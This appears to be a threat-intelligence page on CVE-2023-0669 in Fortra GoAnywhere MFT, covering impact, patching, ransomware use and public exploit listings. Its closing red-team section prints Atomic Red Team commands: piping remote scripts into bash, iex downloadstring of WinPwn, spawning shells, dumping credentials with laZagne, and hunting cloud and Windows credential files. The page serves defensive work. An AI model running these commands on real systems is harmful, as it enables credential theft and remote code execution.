CVE-2023-0669
Overview
The vulnerability is a pre-authentication command injection caused by unsafe deserialization of attacker-controlled objects within the License Response Servlet of Fortra GoAnywhere MFT. The root cause is the deserialization of arbitrary, untrusted data without sufficient validation, enabling execution of malicious payloads. This flaw affects the License Response Servlet component, specifically handling license acceptance requests.
Vulnerability Description
Fortra (formerly, HelpSystems) GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object. This issue was patched in version 7.1.2.
Impact
An unauthenticated attacker can execute arbitrary code on the affected system by sending a specially crafted request, gaining full control over the host. This includes executing system commands with the privileges of the application, potentially leading to data exfiltration, system compromise, and lateral movement within the network. No user interaction or prior authentication is required, increasing the attack surface significantly.
Solution
Apply the vendor patch by upgrading Fortra GoAnywhere MFT to version 7.1.2 or later, as detailed in the official advisory at https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml#zerodayfeb1. Follow the vendor’s instructions precisely to replace vulnerable components. No alternative mitigations are recommended beyond applying the official update.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Confirmed Groups
| Group | Victims | Source |
|---|---|---|
|
clop
|
1254 | ransomware.live |
|
lockbit
|
5 | correlation_misp |
|
lockbit
|
5 | ransomware.live |
|
lockbit green
|
— | correlation_misp |
|
lockbit black
|
— | correlation_misp |
|
lockbit 20
|
— | correlation_misp |
|
lockbit 30
|
— | correlation_misp |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability present in Fortra's GoAnywhere Managed File Transfer product arises from a pre-authentication command injection flaw within the License Response Servlet. This issue is primarily due to the insecure deserialization of an attacker-controlled object, which allows an unauthorized user to execute arbitrary commands on the server before authentication takes place. The underlying problem lies in the way the application processes serialized data without adequate validation or sanitization, leading to a potential compromise of the server's integrity and confidentiality. Attackers can exploit this weakness to manipulate the application's behavior, potentially gaining unauthorized access to sensitive data or executing malicious code.
Exploitation of this vulnerability can occur through various attack vectors. An adversary could craft a malicious request targeting the License Response Servlet, embedding a specially designed payload that the server would deserialize. Once the payload is executed, the attacker could gain control over the server environment, enabling them to perform actions such as data exfiltration, system manipulation, or lateral movement within the network. The pre-authentication nature of this vulnerability significantly lowers the barrier for exploitation, as it does not require prior access to the system, making it particularly dangerous for organizations that rely on this file transfer solution for sensitive operations.
The real-world impact of this vulnerability can be substantial, particularly for businesses that utilize GoAnywhere for critical file transfers. Organizations that handle sensitive data, such as personal identifiable information (PII), financial records, or intellectual property, are at heightened risk. A successful exploitation could lead to severe consequences, including data breaches, regulatory penalties, reputational damage, and operational disruptions. The financial implications of such incidents can be significant, not only due to immediate remediation costs but also due to long-term impacts on customer trust and market position. The combination of a high CVSS score and the potential for widespread exploitation underscores the urgency for affected organizations to address this vulnerability promptly.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. First and foremost, upgrading to the patched version of the software is critical to eliminate the vulnerability. Regularly applying security updates and patches is a fundamental best practice in maintaining the security posture of any application. Additionally, organizations should conduct thorough security assessments and penetration testing to identify any other potential vulnerabilities within their systems. Monitoring network traffic for unusual patterns or unauthorized access attempts can also help in early detection of exploitation attempts. Employing Web Application Firewalls (WAF) and intrusion detection systems can provide an additional layer of defense by filtering out malicious requests before they reach the application.
In conclusion, the pre-authentication command injection vulnerability in Fortra's GoAnywhere Managed File Transfer product poses a significant threat to organizations that depend on this software for secure file transfers. The ease of exploitation, coupled with the potential for severe business impact, necessitates immediate action from affected users. By prioritizing timely updates, continuous monitoring, and robust security practices, organizations can mitigate the risks associated with this vulnerability and protect their sensitive data from malicious actors.
CSURFACE threat intelligence has detected a notable surge in exploitation attempts targeting the CVE-2023-0669 vulnerability in Fortra GoAnywhere MFT. This increase in activity, while moderate, signals growing adversary interest and operational tempo in leveraging this pre-authentication command injection flaw. The persistence of multiple publicly available proof-of-concept exploits continues to lower the barrier for threat actors, including ransomware groups such as Clop and LockBit variants, to weaponize this vulnerability in their campaigns. Our telemetry indicates that exploitation efforts remain steady but are trending upward, underscoring the vulnerability’s ongoing relevance in the current threat landscape. Consequently, the risk level for organizations running affected versions remains elevated, with a heightened likelihood of compromise through remote code execution. This evolving exploitation pattern reinforces the criticality of maintaining patched environments and monitoring for indicators associated with known ransomware actors exploiting this CVE.
Update 2 — May 24, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2023-0669, reflecting a significant uptick in attacker activity leveraging this pre-authentication command injection vulnerability. This surge corresponds with an expanding presence of ransomware groups such as Clop and multiple LockBit variants actively incorporating this exploit into their operational toolkits. Concurrently, new proof-of-concept exploits have emerged in public repositories, lowering the barrier for adversaries to weaponize this vulnerability. While the EPSS score remains high and stable, the qualitative increase in exploitation attempts signals a growing threat momentum that defenders must acknowledge. This evolving landscape elevates the risk profile for organizations running unpatched versions of Fortra GoAnywhere MFT, as the likelihood of successful remote code execution attacks is intensifying. The trend underscores the criticality of vigilant monitoring and reinforces the vulnerability’s sustained relevance in ransomware campaigns.
Update 3 — July 04, 2026
CSURFACE threat intelligence has identified a modest yet meaningful uptick in exploitation attempts targeting CVE-2023-0669, reflecting a sustained adversary interest in leveraging this pre-authentication command injection vulnerability. This increase in activity coincides with the continued availability and refinement of multiple proof-of-concept exploits in public repositories, which lowers the technical barrier for threat actors, including ransomware groups such as Clop and LockBit variants, to operationalize attacks. Although the EPSS score remains at an extreme level, the qualitative rise in detection frequency signals an intensifying exploitation momentum that could translate into broader operational impact if unpatched systems persist. This evolving threat dynamic underscores the vulnerability’s persistent attractiveness as a vector for ransomware campaigns and reinforces the urgency for defenders to maintain heightened vigilance in monitoring and response efforts. The risk posture for organizations running vulnerable versions of Fortra GoAnywhere MFT is elevated, as adversaries increasingly capitalize on accessible exploit code and active targeting patterns.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortra | Goanywhere Managed File Transfer | All |
cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Fortra GoAnywhere MFT Unsafe Deserialization RCE
exploits/multi/http/fortra_goanywhere_rce_cve_2023_0669
|
Ron Bowes, Frycos (Florian Hauser) | Unknown | unix, win | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE) | Youssef Muhammad | webapps | java | - | View |
GitHub PoCs (6)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
0xf4n9x/CVE-2023-0669
CVE-2023-0669 GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response S...
|
0xf4n9x | 103 | 22 | 2023-02-10 | View |
|
Avento/CVE-2023-0669
GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet Deserialization Vulnerabilities Python RCE PoC(Proof of Concept)
|
Avento | 8 | 3 | 2023-04-06 | View |
|
yosef0x01/CVE-2023-0669-Analysis
CVE analysis for CVE-2023-0669
|
yosef0x01 | 7 | 2 | 2023-02-26 | View |
|
Griffin-01/CVE-2023-0669
|
Griffin-01 | 0 | 0 | 2023-02-21 | View |
|
zakaria-laouani/cve-2023-0669-simulation
|
zakaria-laouani | 0 | 0 | 2025-12-24 | View |
|
cataliniovita/CVE-2023-0669
CVE-2023-0669 GoAnywhere MFT command injection vulnerability
|
cataliniovita | 0 | 0 | 2023-02-15 | View |
Ransomware Groups 7
Threat Feed
31 eventsSighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Cobalt Strike, PowerShell Empire, TinyMet (1254 known victims)
Ransomware group known to exploit this vulnerability (5 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (5 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability. Tools: Cobalt Strike, PowerShell Empire, TinyMet (1254 known victims)
Ransomware group known to exploit this vulnerability (5 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
48%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.